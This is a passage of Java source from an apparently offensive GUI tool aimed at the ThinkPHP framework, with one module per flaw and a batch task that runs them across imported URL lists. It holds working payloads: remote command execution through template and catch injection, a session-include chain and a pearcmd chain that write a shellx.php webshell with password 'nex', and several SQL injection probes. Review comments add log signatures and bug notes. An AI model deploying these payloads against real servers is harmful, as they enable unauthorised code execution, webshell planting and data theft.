62 | payloads.add(payload3);
63 | payloads.add(payload1);
64 | payloads.add(payload2);
65 | payloads.add(payload4);
66 | payloads.add(payload5);
67 | payloads.add(payload6);
68 | for (String route : routers) {
69 | int ct = 0;
70 | for (String payload : payloads) {
71 | ct += 1;
// A fresh session id is generated for every attempt.
72 | String randomStr = Tools.getRandomString(25).toLowerCase();
73 | Map headers = new HashMap<>();
74 | headers.put("Content-type", "application/x-www-form-urlencoded");
75 | headers.put("Cookie", "PHPSESSID=" + randomStr);
76 | HttpRequest res = HttpRequest.post(url + route).headers(headers).send(payload);
// As in checkVUL, the second step runs only after a 5xx answer to the first.
77 | if (res.serverError()) {
78 | payload = "_method=__construct&method=GET&filter[]=think\\__include_file&get[]=/tmp/sess_" + randomStr + "&server[]=1";
// For the 4th to 6th bodies the include argument is sent reversed and turned
// back by the strrev filter listed before think\__include_file.
79 | if (ct > 3) {
80 | payload = "_method=__construct&filter[]=strrev&filter[]=think\\__include_file&method=get&server[]=1&get[]=" + (new StringBuilder(randomStr)).reverse() + "_sses/pmt/=ecruoser/edoced-46esab.trevnoc=daer/retlif//:php";
81 | }
82 | String res0 = HttpRequest.post(url + route).headers(headers).send(payload).body();
// Success is decided by the status of a request to /shellx.php alone.
83 | HttpRequest res1 = HttpRequest.post(url + "/shellx.php");
84 | if (res1.ok()) {
85 | return new Result(true, null, url + "/shellx.php" + " Pass:nex");
86 | }
87 |
88 | if (res0.contains("think|a:")) {
// Message for ct == 3: no file was written; it lists method, URL and POST body for manual use.
89 | if (ct == 3) {
90 | return new Result(true, null, "可以尝试无文件落地GetShell,连接方式:\n[+] 请求方式: POST\n[+] URL: " + url + route + "\n[+] POST参数: " + payload);
91 | }
// Message: the session include is present but the write failed; check directory write permission.
92 | return new Result(false, null, "存在session包含漏洞,但上传失败, 请确认目录是否有写入权限!");
93 | }
94 | }
95 |
96 | }
97 | }
98 |
99 | } catch (Exception e) {
100 | e.printStackTrace();
101 | return new Result(false, null, null);
102 | }
103 |
104 | return new Result(false, null, null);
105 | }
106 |
/**
 * Base64-encodes content, replaces every '=' with '+', prepends a short filler
 * depending on the resulting length, and URL-encodes the result.
 *
 * NOTE(review): the length thresholds (7, 98, 997) and the fillers are not explained
 * in this file; presumably they align the encoded text inside the session file.
 *
 * @param content text to encode
 * @return the URL-encoded, padded Base64 text
 * @throws UnsupportedEncodingException declared for URLEncoder.encode with the "UTF-8" name
 */
107 | public String bypass(String content) throws UnsupportedEncodingException {
108 | String temp = Base64.getEncoder().encodeToString(content.getBytes(StandardCharsets.UTF_8));
// When the first encoding is exactly 98 characters, the input is altered and encoded again.
109 | if (temp.length() == 98) {
110 | content = content.replace("?>", ";?>");
111 | content = Base64.getEncoder().encodeToString(content.getBytes(StandardCharsets.UTF_8));
112 | } else {
113 | content = temp;
114 | }
115 |
116 | content = content.replace("=", "+");
117 | if (content.length() < 7) {
118 | content = "abc" + content;
119 | }
120 |
121 | if (content.length() < 98) {
122 | content = "ab" + content;
123 | }
124 |
125 | if (content.length() > 98 && content.length() < 997) {
126 | content = "a" + content;
127 | }
128 |
129 | content = URLEncoder.encode(content, "UTF-8");
130 | return content;
131 | }
132 | }
133 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/exploit/tp5_showid_rce.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.exploit;
2 |
3 | import com.github.kevinsawicki.http.HttpRequest;
4 | import com.thinkphp.thinkphpgui.common.BasePayload;
5 | import com.thinkphp.thinkphpgui.entity.Result;
6 |
7 | import java.time.LocalDate;
8 | import java.time.format.DateTimeFormatter;
9 |
/**
 * Probe and command request for the check this tool calls "ThinkPHP 5 show-id RCE".
 *
 * <p>Both methods work in two requests: the first sends a template expression in the
 * {@code s=my-show-id-...} route, the second uses the same route to read today's file
 * under {@code Runtime\Logs}. In access logs the pattern is an {@code s=} value that
 * starts with {@code my-show-id-} and contains {@code \x5C..} sequences. The log date
 * is taken from the clock of the machine running the check.
 */
public class tp5_showid_rce implements BasePayload {
    private static final String TITLE = "ThinkPHP 5 show-id RCE";

    /**
     * Sends the {@code var_dump(md5(2333))} expression, then reports the target when
     * the log route's body contains the expected digest fragment.
     *
     * @param url base URL of the application under test
     * @return positive result carrying the first request's URL, or a negative result
     * @throws Exception declared in the signature; request errors are printed and swallowed
     */
    @Override
    public Result checkVUL(String url) throws Exception {
        final String marker = "56540676a129760a3";
        final String trigger = url + "/index.php?s=my-show-id-%5Cx5C..%5Cx5CTpl%5Cx5C8edy%5Cx5CHome%5Cx5Cmy_1%7B~var_dump(md5(2333))%7D%5D";
        boolean hit = false;
        try {
            HttpRequest.get(trigger).code();
            hit = HttpRequest.get(todaysLogRoute(url)).body().contains(marker);
        } catch (Exception ex) {
            ex.printStackTrace();
        }
        return hit ? new Result(true, TITLE, trigger) : new Result(false, TITLE, null);
    }

    /**
     * Sends a {@code system("<cmd>")} expression, then returns the body of the log
     * route's response, but only when that response has a 5xx status.
     *
     * @param url base URL of the application under test
     * @param cmd text placed inside the expression, appended as given
     * @return {@code Result(true, null, body)} on a 5xx log response, else {@code Result(false, null, null)}
     * @throws Exception declared in the signature; request errors are printed and swallowed
     */
    @Override
    public Result exeVUL(String url, String cmd) throws Exception {
        final String trigger = url + "/index.php?s=my-show-id-\\x5C..\\x5CTpl\\x5C8edy\\x5CHome\\x5Cmy_1{~system(\"" + cmd + "\")}]";
        try {
            HttpRequest.get(trigger).code();
            HttpRequest logResponse = HttpRequest.get(todaysLogRoute(url));
            if (logResponse.serverError()) {
                return new Result(true, null, logResponse.body());
            }
        } catch (Exception ex) {
            ex.printStackTrace();
        }
        return new Result(false, null, null);
    }

    /** Not implemented for this check; always reports failure. */
    @Override
    public Result getShell(String url) throws Exception {
        return new Result(false, null, null);
    }

    /** Builds the route that points at today's {@code yy_MM_dd.log} file. */
    private static String todaysLogRoute(String url) {
        String stamp = LocalDate.now().format(DateTimeFormatter.ofPattern("yy_MM_dd"));
        return url + "/index.php?s=my-show-id-\\x5C..\\x5CRuntime\\x5CLogs\\x5C" + stamp + ".log'";
    }
}
59 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/exploit/tp5_sql.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.exploit;
2 |
3 | import com.github.kevinsawicki.http.HttpRequest;
4 | import com.thinkphp.thinkphpgui.common.BasePayload;
5 | import com.thinkphp.thinkphpgui.entity.Result;
6 |
/**
 * Error-based probe for the check this tool calls ThinkPHP 5 SQL injection and
 * sensitive information leak.
 *
 * <p>Detection only: one GET with an {@code updatexml(...)} expression inside the
 * {@code ids[...]} parameter name. The target is reported when the body contains
 * {@code XPATH}, which also means database error text reaches the client.
 */
public class tp5_sql implements BasePayload {
    private static final String TITLE = "ThinkPHP 5 SQL注入漏洞 && 敏感信息泄露";

    /**
     * @param url base URL of the application under test
     * @return positive result carrying the probed URL, or a negative result
     * @throws Exception declared in the signature; request errors are printed and swallowed
     */
    @Override
    public Result checkVUL(String url) throws Exception {
        final String probe = url + "/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1";
        boolean errorEchoed = false;
        try {
            errorEchoed = HttpRequest.get(probe).body().contains("XPATH");
        } catch (Exception ex) {
            ex.printStackTrace();
        }
        if (!errorEchoed) {
            return new Result(false, TITLE, null);
        }
        return new Result(true, TITLE, probe);
    }

    /** Not implemented for this check; always reports failure. */
    @Override
    public Result exeVUL(String url, String cmd) throws Exception {
        return new Result(false, null, null);
    }

    /** Not implemented for this check; always reports failure. */
    @Override
    public Result getShell(String url) throws Exception {
        return new Result(false, null, null);
    }
}
33 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/exploit/tp6_lang.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.exploit;
2 |
3 | import com.github.kevinsawicki.http.HttpRequest;
4 | import com.thinkphp.thinkphpgui.common.BasePayload;
5 | import com.thinkphp.thinkphpgui.entity.Result;
6 |
/**
 * Check labelled "ThinkPHP 6" file inclusion through the {@code lang} parameter.
 *
 * <p>Requests are recognisable in access logs by a {@code lang=} value made of
 * {@code ../} sequences; {@code getShell} additionally carries {@code +config-create+}
 * and a path ending in {@code pearcmd}.
 */
public class tp6_lang implements BasePayload {
    private static final String TITLE = "ThinkPHP 6 文件包含漏洞";

    /**
     * Sends one GET with {@code lang=../../../../../public/index} and reports the target
     * when the status is exactly 500.
     *
     * <p>NOTE(review): any 500 response counts, whatever caused it, so this is a weak
     * signal. The positive message itself says exploitation conditions are strict.
     *
     * @param url base URL of the application under test
     * @return positive result with the probed URL and a hint, or a negative result
     * @throws Exception declared in the signature; request errors are printed and swallowed
     */
    @Override
    public Result checkVUL(String url) throws Exception {
        final String probe = url + "/?lang=../../../../../public/index";
        boolean serverFailed = false;
        try {
            serverFailed = HttpRequest.get(probe).code() == 500;
        } catch (Exception ex) {
            ex.printStackTrace();
        }
        return serverFailed
                ? new Result(true, TITLE, probe + " (注意漏洞利用条件苛刻,最好结合手动利用;工具不可执行命令,可尝试点击GETSHELL按钮!)")
                : new Result(false, TITLE, null);
    }

    /** Not implemented for this check; always reports failure. */
    @Override
    public Result exeVUL(String url, String cmd) throws Exception {
        return new Result(false, null, null);
    }

    /**
     * Sends one GET that points {@code lang} at {@code pearcmd} with a
     * {@code config-create} argument naming {@code shellx.php}, then requests
     * {@code /shellx.php} and reports success on HTTP 200.
     *
     * <p>Success rests on the status code alone. Evidence on a host where the request
     * took effect: a {@code shellx.php} file in the web root.
     *
     * @param url base URL of the application under test
     * @return positive result naming the file URL, or {@code Result(false, null, null)}
     * @throws Exception declared in the signature; request errors are printed and swallowed
     */
    @Override
    public Result getShell(String url) throws Exception {
        final String written = url + "/shellx.php";
        boolean reachable = false;
        try {
            HttpRequest.get(url + "/?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/=@eval($_POST['nex']);?>+shellx.php").code();
            reachable = HttpRequest.get(written).code() == 200;
        } catch (Exception ex) {
            ex.printStackTrace();
        }
        if (reachable) {
            return new Result(true, null, written + " Pass:nex (用蚁剑连接)");
        }
        return new Result(false, null, null);
    }
}
43 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/exploit/tp6_log.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.exploit;
2 |
3 | import com.github.kevinsawicki.http.HttpRequest;
4 | import com.thinkphp.thinkphpgui.common.BasePayload;
5 | import com.thinkphp.thinkphpgui.entity.Result;
6 |
7 | import java.util.ArrayList;
8 | import java.util.Date;
9 |
10 |
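/**
 * Probe for ThinkPHP 6.x runtime logs that are readable over HTTP.
 *
 * <p>Detection only. A positive means today's log file under {@code /runtime/log/} was
 * served to an unauthenticated client; the runtime directory should not be reachable
 * through the web server at all.
 */
public class tp6_log implements BasePayload {
    private static final String TITLE = "ThinkPHP 6.x 日志泄露";

    /**
     * Requests today's {@code yyyyMM/dd.log} directly under {@code /runtime/log/} and
     * under its {@code Home}, {@code Common} and {@code Admin} subdirectories, and
     * reports the first body that contains {@code RunTime} or {@code [ error ]}.
     *
     * <p>The date comes from the clock of the machine running the check. One
     * {@code try} wraps the whole loop: the first failing request ends the check.
     *
     * @param url base URL of the application under test
     * @return positive result carrying the log URL, or a negative result
     * @throws Exception declared in the signature; request errors are printed and swallowed
     */
    @Override
    public Result checkVUL(String url) throws Exception {
        Date today = new Date();
        String file = String.format("%tY", today) + String.format("%tm", today) + "/" + String.format("%td", today) + ".log";
        // Typed array instead of a raw, double-brace ArrayList, so the loop iterates Strings.
        String[] candidates = {
            url + "/runtime/log/" + file,
            url + "/runtime/log/Home/" + file,
            url + "/runtime/log/Common/" + file,
            url + "/runtime/log/Admin/" + file,
        };
        try {
            for (String candidate : candidates) {
                String body = HttpRequest.get(candidate).body();
                if (body.contains("RunTime") || body.contains("[ error ]")) {
                    return new Result(true, TITLE, candidate);
                }
            }
        } catch (Exception e) {
            e.printStackTrace();
        }
        return new Result(false, TITLE, null);
    }

    /** Not implemented for this check; always reports failure. */
    @Override
    public Result exeVUL(String url, String cmd) throws Exception {
        return new Result(false, null, null);
    }

    /** Not implemented for this check; always reports failure. */
    @Override
    public Result getShell(String url) throws Exception {
        return new Result(false, null, null);
    }
}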
50 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/exploit/tp6_session_file_write.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.exploit;
2 |
3 | import com.github.kevinsawicki.http.HttpRequest;
4 | import com.thinkphp.thinkphpgui.common.BasePayload;
5 | import com.thinkphp.thinkphpgui.entity.Result;
6 | import com.thinkphp.thinkphpgui.util.Tools;
7 |
8 | import java.util.HashMap;
9 | import java.util.Map;
10 |
/**
 * Probe for the check this tool calls ThinkPHP 6 session file write.
 *
 * <p>One GET is sent to a randomly named {@code .php} path with a {@code PHPSESSID}
 * cookie of {@code ../../../../public/<name>.php}. The target is reported when the body
 * is the serialized session {@code a:1:{s:4:"name";s:8:"thinkphp";}}.
 *
 * <p>NOTE(review): a positive presumably means the server created that file under its
 * public directory; nothing here removes it, so clean it up after testing. In access
 * logs the probe is a {@code PHPSESSID} value containing {@code ../} and ending in
 * {@code .php}.
 */
public class tp6_session_file_write implements BasePayload {
    private static final String TITLE = "ThinkPHP 6 session文件写入";

    /**
     * @param url base URL of the application under test
     * @return positive result quoting the cookie that was sent, or a negative result
     * @throws Exception if {@code Tools.getRandomString} throws; request errors are printed and swallowed
     */
    @Override
    public Result checkVUL(String url) throws Exception {
        final String name = Tools.getRandomString(7);
        final String target = url + "/" + name + ".php";
        final Map<String, String> cookie = new HashMap<>();
        cookie.put("Cookie", "PHPSESSID=../../../../public/" + name + ".php");
        boolean sessionServed = false;
        try {
            sessionServed = HttpRequest.get(target).headers(cookie).body()
                    .contains("a:1:{s:4:\"name\";s:8:\"thinkphp\";}");
        } catch (Exception ex) {
            ex.printStackTrace();
        }
        if (sessionServed) {
            return new Result(true, TITLE, "headers: Cookie: PHPSESSID=../../../../public/" + name + ".php");
        }
        return new Result(false, TITLE, null);
    }

    /** Not implemented for this check; always reports failure. */
    @Override
    public Result exeVUL(String url, String cmd) throws Exception {
        return new Result(false, null, null);
    }

    /** Not implemented for this check; always reports failure. */
    @Override
    public Result getShell(String url) throws Exception {
        return new Result(false, null, null);
    }
}
39 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/exploit/tp_catch.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.exploit;
2 |
3 | import com.github.kevinsawicki.http.HttpRequest;
4 | import com.thinkphp.thinkphpgui.common.BasePayload;
5 | import com.thinkphp.thinkphpgui.entity.Result;
6 |
/**
 * Probe and command request for the check this tool calls ThinkPHP catch command
 * execution.
 *
 * <p>Both methods POST a form body to {@code /index.php/Home/Index/index.html} whose
 * {@code a3} value starts with an encoded CRLF and ends with {@code //}. Request bodies
 * are not in ordinary access logs, so detection needs body logging or a WAF rule on
 * that parameter.
 */
public class tp_catch implements BasePayload {
    private static final String TITLE = "ThinkPHP catch 命令执行漏洞";
    private static final String ROUTE = "/index.php/Home/Index/index.html";

    /**
     * Posts a {@code var_dump("test")} body and reports the target when the response
     * contains {@code string(4) "test"}.
     *
     * @param url base URL of the application under test
     * @return positive result with the URL and POST body, or a negative result
     * @throws Exception declared in the signature; request errors are printed and swallowed
     */
    @Override
    public Result checkVUL(String url) throws Exception {
        final String endpoint = url + ROUTE;
        boolean echoed = false;
        try {
            echoed = HttpRequest.post(endpoint)
                    .header("Content-type", "application/x-www-form-urlencoded")
                    .send("a3=%0d%0avar_dump(\"test\");%0d%0a//")
                    .body()
                    .contains("string(4) \"test\"");
        } catch (Exception ex) {
            ex.printStackTrace();
        }
        return echoed
                ? new Result(true, TITLE, endpoint + " Post: a3=%0d%0avar_dump(\"test\");%0d%0a//")
                : new Result(false, TITLE, null);
    }

    /**
     * Posts a {@code system("<cmd>")} body and returns the response body. The response
     * is not inspected, so any readable answer is returned as a success.
     *
     * @param url base URL of the application under test
     * @param cmd text placed inside the call, appended as given
     * @return {@code Result(true, null, body)} when a body was read, else {@code Result(false, null, null)}
     * @throws Exception declared in the signature; request errors are printed and swallowed
     */
    @Override
    public Result exeVUL(String url, String cmd) throws Exception {
        final String endpoint = url + ROUTE;
        try {
            HttpRequest request = HttpRequest.post(endpoint)
                    .header("Content-type", "application/x-www-form-urlencoded");
            return new Result(true, null, request.send("a3=%0d%0asystem(\"" + cmd + "\");%0d%0a//").body());
        } catch (Exception ex) {
            ex.printStackTrace();
            return new Result(false, null, null);
        }
    }

    /** Not implemented for this check; always reports failure. */
    @Override
    public Result getShell(String url) throws Exception {
        return new Result(false, null, null);
    }
}
39 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/exploit/tp_checkcode_time_sqli.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.exploit;
2 |
3 | import com.github.kevinsawicki.http.HttpRequest;
4 | import com.thinkphp.thinkphpgui.common.BasePayload;
5 | import com.thinkphp.thinkphpgui.entity.Result;
6 |
7 | import java.time.LocalTime;
8 | import java.util.HashMap;
9 | import java.util.Map;
10 |
/**
 * Time-based probe for the check this tool calls ThinkPHP check-code SQL injection.
 *
 * <p>Detection only: one multipart POST to {@code /index.php?s=/home/user/checkcode/}
 * whose {@code couponid} field contains a mixed-case {@code slEEp(8)} call.
 */
public class tp_checkcode_time_sqli implements BasePayload {
    private static final String TITLE = "ThinkPHP check-code sql注入漏洞";

    /**
     * Sends the request and compares the time before and after it.
     *
     * <p>NOTE(review): the test is {@code LocalTime.now().compareTo(start) >= 8}.
     * {@code compareTo} reports ordering only (on standard JDKs -1, 0 or 1), not elapsed
     * seconds, so as written the positive branch is not reached and the check reports
     * false whatever the target does. Do not read a negative here as "not vulnerable".
     *
     * @param url base URL of the application under test
     * @return positive result with the URL and POST body, or a negative result
     * @throws Exception declared in the signature; request errors are printed and swallowed
     */
    @Override
    public Result checkVUL(String url) throws Exception {
        final LocalTime before = LocalTime.now();
        final Map<String, String> requestHeaders = new HashMap<>();
        requestHeaders.put("Content-Type", "multipart/form-data; boundary=--------641902708");
        requestHeaders.put("Accept-Encoding", "gzip, deflate, sdch");
        final String endpoint = url + "/index.php?s=/home/user/checkcode/";
        final String form = "----------641902708\r\nContent-Disposition: form-data; name=\"couponid\"\r\n\r\n1')UniOn SelEct slEEp(8)#\r\n\r\n----------641902708--";

        boolean delayed = false;
        try {
            HttpRequest.post(endpoint).headers(requestHeaders).send(form).code();
            delayed = LocalTime.now().compareTo(before) >= 8;
        } catch (Exception ex) {
            ex.printStackTrace();
        }
        return delayed
                ? new Result(true, TITLE, endpoint + " Post:" + form)
                : new Result(false, TITLE, null);
    }

    /** Not implemented for this check; always reports failure. */
    @Override
    public Result exeVUL(String url, String cmd) throws Exception {
        return new Result(false, null, null);
    }

    /** Not implemented for this check; always reports failure. */
    @Override
    public Result getShell(String url) throws Exception {
        return new Result(false, null, null);
    }
}
42 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/exploit/tp_multi_sql_leak.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.exploit;
2 |
3 | import com.github.kevinsawicki.http.HttpRequest;
4 | import com.thinkphp.thinkphpgui.common.BasePayload;
5 | import com.thinkphp.thinkphpgui.entity.Result;
6 | import java.util.ArrayList;
7 |
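/**
 * Error-based probe over several routes of an application built on ThinkPHP.
 *
 * <p>Detection only. Each route is requested with a trailing encoded single quote
 * ({@code %27}); the target is reported when a body contains {@code SQL syntax}, which
 * means both that the parameter reaches a query unescaped and that database error text
 * is shown to the client.
 */
public class tp_multi_sql_leak implements BasePayload {
    private static final String TITLE = "ThinkPHP multi sql注入 && 信息泄露漏洞";

    // Typed array instead of a raw ArrayList, so the for-each below iterates Strings.
    // The original list held the pay/chongzhi/orderid route twice; it is listed once.
    private static final String[] ROUTES = {
        "/index.php?s=/home/shopcart/getPricetotal/tag/1%27",
        "/index.php?s=/home/shopcart/getpriceNum/id/1%27",
        "/index.php?s=/home/user/cut/id/1%27",
        "/index.php?s=/home/service/index/id/1%27",
        "/index.php?s=/home/pay/chongzhi/orderid/1%27",
        "/index.php?s=/home/order/complete/id/1%27",
        "/index.php?s=/home/order/detail/id/1%27",
        "/index.php?s=/home/order/cancel/id/1%27",
    };

    /**
     * @param url base URL of the application under test
     * @return positive result carrying the first matching URL, or a negative result
     * @throws Exception declared in the signature; request errors are printed and the next route is tried
     */
    @Override
    public Result checkVUL(String url) throws Exception {
        for (String route : ROUTES) {
            String probe = url + route;
            try {
                if (HttpRequest.get(probe).body().contains("SQL syntax")) {
                    return new Result(true, TITLE, probe);
                }
            } catch (Exception e) {
                e.printStackTrace();
            }
        }
        return new Result(false, TITLE, null);
    }

    /** Not implemented for this check; always reports failure. */
    @Override
    public Result exeVUL(String url, String cmd) throws Exception {
        return new Result(false, null, null);
    }

    /** Not implemented for this check; always reports failure. */
    @Override
    public Result getShell(String url) throws Exception {
        return new Result(false, null, null);
    }
}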
47 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/exploit/tp_pay_orderid_sqli.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.exploit;
2 |
3 | import com.github.kevinsawicki.http.HttpRequest;
4 | import com.thinkphp.thinkphpgui.common.BasePayload;
5 | import com.thinkphp.thinkphpgui.entity.Result;
6 |
/**
 * Union-based probe for the check this tool calls ThinkPHP orderid SQL injection.
 *
 * <p>Detection only: one GET to {@code /index.php?s=/home/pay/index/orderid/...} with a
 * mixed-case UNION SELECT of {@code Md5(2333)}, using SQL comments in place of spaces.
 * A filter that matches keywords case-sensitively or expects literal spaces will not
 * see this request.
 */
public class tp_pay_orderid_sqli implements BasePayload {
    private static final String TITLE = "ThinkPHP orderid sql注入";

    /**
     * Reports the target when the body contains the digest fragment
     * {@code 56540676a129760a}.
     *
     * @param url base URL of the application under test
     * @return positive result carrying the probed URL, or a negative result
     * @throws Exception declared in the signature; request errors are printed and swallowed
     */
    @Override
    public Result checkVUL(String url) throws Exception {
        final String probe = url + "/index.php?s=/home/pay/index/orderid/1%27)UnIoN/**/All/**/SeLeCT/**/Md5(2333)--+";
        boolean digestSeen = false;
        try {
            digestSeen = HttpRequest.get(probe).body().contains("56540676a129760a");
        } catch (Exception ex) {
            ex.printStackTrace();
        }
        return digestSeen ? new Result(true, TITLE, probe) : new Result(false, TITLE, null);
    }

    /** Not implemented for this check; always reports failure. */
    @Override
    public Result exeVUL(String url, String cmd) throws Exception {
        return new Result(false, null, null);
    }

    /** Not implemented for this check; always reports failure. */
    @Override
    public Result getShell(String url) throws Exception {
        return new Result(false, null, null);
    }
}
33 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/exploit/tp_update_sql.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.exploit;
2 |
3 | import com.github.kevinsawicki.http.HttpRequest;
4 | import com.thinkphp.thinkphpgui.common.BasePayload;
5 | import com.thinkphp.thinkphpgui.entity.Result;
6 |
/**
 * Error-based probe for the check this tool calls ThinkPHP update SQL injection.
 *
 * <p>Detection only: one GET to {@code /index.php} with array parameters
 * {@code id[0]=bind} and an {@code updatexml(...)} expression in {@code id[1]}. A
 * positive also means database error text is shown to the client.
 */
public class tp_update_sql implements BasePayload {
    private static final String TITLE = "ThinkPHP update sql注入";

    /**
     * Reports the target when the body contains the digest fragment
     * {@code cf67355a3333e6e143439161adc2d82}.
     *
     * @param url base URL of the application under test
     * @return positive result carrying the probed URL, or a negative result
     * @throws Exception declared in the signature; request errors are printed and swallowed
     */
    @Override
    public Result checkVUL(String url) throws Exception {
        final String probe = url + "/index.php?money[]=1123&user=liao&id[0]=bind&id[1]=0%20and%20(updatexml(1,concat(0x7e,(select%20md5(520)),0x7e),1))";
        boolean digestSeen = false;
        try {
            digestSeen = HttpRequest.get(probe).body().contains("cf67355a3333e6e143439161adc2d82");
        } catch (Exception ex) {
            ex.printStackTrace();
        }
        if (!digestSeen) {
            return new Result(false, TITLE, null);
        }
        return new Result(true, TITLE, probe);
    }

    /** Not implemented for this check; always reports failure. */
    @Override
    public Result exeVUL(String url, String cmd) throws Exception {
        return new Result(false, null, null);
    }

    /** Not implemented for this check; always reports failure. */
    @Override
    public Result getShell(String url) throws Exception {
        return new Result(false, null, null);
    }
}
33 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/exploit/tp_view_recent_xff_sqli.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.exploit;
2 |
3 | import com.github.kevinsawicki.http.HttpRequest;
4 | import com.thinkphp.thinkphpgui.common.BasePayload;
5 | import com.thinkphp.thinkphpgui.entity.Result;
6 |
/**
 * Error-based probe for the check this tool calls ThinkPHP recent_xff SQL injection.
 *
 * <p>Detection only: one GET to {@code /index.php?s=/home/article/view_recent/name/1}
 * with the SQL expression carried in the {@code X-Forwarded-For} header rather than in
 * the URL. The URL in the access log looks ordinary; the header has to be logged or
 * inspected to see the probe, and the reported result contains only the URL.
 */
public class tp_view_recent_xff_sqli implements BasePayload {
    private static final String TITLE = "ThinkPHP recent_xff sql注入";

    /**
     * Reports the target when the body contains the digest fragment
     * {@code 56540676a129760a}.
     *
     * @param url base URL of the application under test
     * @return positive result carrying the probed URL, or a negative result
     * @throws Exception declared in the signature; request errors are printed and swallowed
     */
    @Override
    public Result checkVUL(String url) throws Exception {
        final String probe = url + "/index.php?s=/home/article/view_recent/name/1";
        boolean digestSeen = false;
        try {
            HttpRequest request = HttpRequest.get(probe)
                    .header("X-Forwarded-For","1')And/**/ExtractValue(1,ConCat(0x5c,(sElEct/**/Md5(2333))))#");
            digestSeen = request.body().contains("56540676a129760a");
        } catch (Exception ex) {
            ex.printStackTrace();
        }
        return digestSeen ? new Result(true, TITLE, probe) : new Result(false, TITLE, null);
    }

    /** Not implemented for this check; always reports failure. */
    @Override
    public Result exeVUL(String url, String cmd) throws Exception {
        return new Result(false, null, null);
    }

    /** Not implemented for this check; always reports failure. */
    @Override
    public Result getShell(String url) throws Exception {
        return new Result(false, null, null);
    }
}
33 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/service/BatchCheckTask.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.service;
2 |
3 | import com.github.kevinsawicki.http.HttpRequest;
4 | import com.thinkphp.thinkphpgui.common.BasePayload;
5 | import com.thinkphp.thinkphpgui.util.ExpList;
6 | import com.thinkphp.thinkphpgui.entity.Result;
7 | import com.thinkphp.thinkphpgui.util.Tools;
8 | import javafx.application.Platform;
9 | import javafx.concurrent.Task;
10 | import javafx.scene.control.Alert;
11 | import javafx.scene.control.ComboBox;
12 | import javafx.scene.control.TextArea;
13 |
14 | import java.util.ArrayList;
15 | import java.util.List;
16 |
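/**
 * Background task that runs the selected check, or every registered check, against each URL
 * of an imported list and streams the outcome into a text area.
 *
 * <p>{@link #call()} runs off the JavaFX application thread, so every UI access made from it
 * is marshalled through {@link Platform#runLater(Runnable)}.
 */
public class BatchCheckTask extends Task<Void> {
    private static final String SEPARATOR =
            "=====================================================================";

    // Created with the task, i.e. on whichever thread constructs it.
    // NOTE(review): Alert must be created on the FX thread - confirm the controller does so.
    Alert alert = new Alert(Alert.AlertType.INFORMATION);
    private final ComboBox<String> comboBox;
    private final TextArea infores_txt;
    private final List<String> list_url;

    /**
     * @param list_url    target base URLs, one check run per entry
     * @param comboBox    selector whose current item names the check to run ("ALL..." runs all)
     * @param infores_txt text area that receives the log lines
     */
    public BatchCheckTask(List<String> list_url, ComboBox<String> comboBox, TextArea infores_txt) {
        this.list_url = list_url;
        this.comboBox = comboBox;
        this.infores_txt = infores_txt;
    }

    @Override
    protected Void call() throws Exception {
        batch_check_url();
        return null;
    }

    /**
     * Appends one line to the output area.
     *
     * <p>The append is posted to the FX thread because this method is called from the
     * background thread; runLater keeps the lines in submission order.
     */
    public void loginfo(String info) {
        Platform.runLater(() -> this.infores_txt.appendText(info + "\r\n"));
    }

    /**
     * Runs the selected check(s) against every URL in the list.
     *
     * <p>In "ALL" mode each URL is first probed for reachability and skipped when the probe
     * fails. A check that throws, or a selection with no registered check, is logged and the
     * batch continues, so one bad target cannot hide the results for the rest.
     *
     * @throws Exception kept for interface compatibility
     */
    public void batch_check_url() throws Exception {
        if (list_url.isEmpty()) {
            // A dedicated dialog: the shared `alert` is reused by succeeded(), which also
            // fires after this early return, and one dialog cannot be shown twice at once.
            Platform.runLater(() -> {
                Alert emptyInput = new Alert(Alert.AlertType.INFORMATION);
                emptyInput.setTitle("提示:");
                emptyInput.setHeaderText("URL批量检查");
                emptyInput.setContentText("请先导入URL!");
                emptyInput.showAndWait();
            });
            return;
        }

        // NOTE(review): the selection is read off the FX thread; consider capturing it in
        // the constructor instead.
        String version = this.comboBox.getSelectionModel().getSelectedItem();

        if (version != null && version.startsWith("ALL")) {
            List<String> versions = ExpList.get_exp();
            for (String s : list_url) {
                if (isCancelled()) {
                    break;
                }
                loginfo("检测URL " + s + "中......");
                loginfo(SEPARATOR);
                if (!isReachable(s)) {
                    loginfo(s + " 未存活,跳过!");
                    continue;
                }
                for (String v : versions) {
                    if (isCancelled()) {
                        break;
                    }
                    runCheck(v, Tools.getPayload(v), s);
                }
            }
            return;
        }

        BasePayload bp = Tools.getPayload(version);
        for (int j = 0; j < list_url.size(); j++) {
            if (isCancelled()) {
                break;
            }
            if (j != 0) {
                loginfo("");
            }
            loginfo("检测URL " + list_url.get(j) + "中......");
            loginfo(SEPARATOR);
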